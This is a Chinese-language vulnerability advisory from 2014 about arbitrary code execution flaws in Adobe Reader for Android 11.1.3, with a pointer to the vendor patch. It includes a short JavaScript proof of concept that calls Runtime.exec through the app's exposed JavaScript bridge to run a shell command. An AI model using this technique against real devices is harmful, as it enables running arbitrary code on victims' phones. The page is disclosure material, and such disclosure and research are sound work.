Welcome 微信登录
编程资源 图片资源库 蚂蚁家优选 PDF转换器

首页 / 操作系统 / Linux / Adobe Reader for Android多个任意代码执行漏洞

发布日期:2014-04-14
更新日期:2014-04-15受影响系统:
Adobe Reader for Android
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 66798
 
Adobe Reader for Android是Android 和iOS 设备(包括iPad 和iPhone)上使用的免费Adobe Reader移动应用程序。
 
Adobe Reader for Android 11.1.3在实现上存在多个任意代码执行漏洞,攻击者可利用这些漏洞在受影响应用上下文中执行任意代码。
 
<*来源:Yorick Koster
 *>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
function execute(bridge, cmd) {
    return bridge.getClass().forName("java.lang.Runtime")
     .getMethod("getRuntime",null).invoke(null,null).exec(cmd);
 }
 
if(window._app) {
    try {
     var path = "/data/data/com.adobe.reader/mobilereader.poc.txt";
     execute(window._app, ["/system/bin/sh","-c","echo "Lorem ipsum" > " + path]);
     window._app.alert(path + " created", 3);
    } catch(e) {
     window._app.alert(e, 0);
    }
 }建议:
--------------------------------------------------------------------------------
厂商补丁:
 
Adobe
 -----
 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
 
http://www.adobe.com/support/security/vtiger CRM远程代码执行漏洞OpenSSL "ssl3_release_read_buffer()"释放后重利用内存破坏漏洞相关资讯      Adobe Reader for Android  本文评论 查看全部评论 (0)
表情: 姓名: 字数


评论声明
  • 尊重网上道德,遵守中华人民共和国的各项有关法律法规
  • 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
  • 本站管理人员有权保留或删除其管辖留言中的任意内容
  • 本站有权在网站内转载或引用您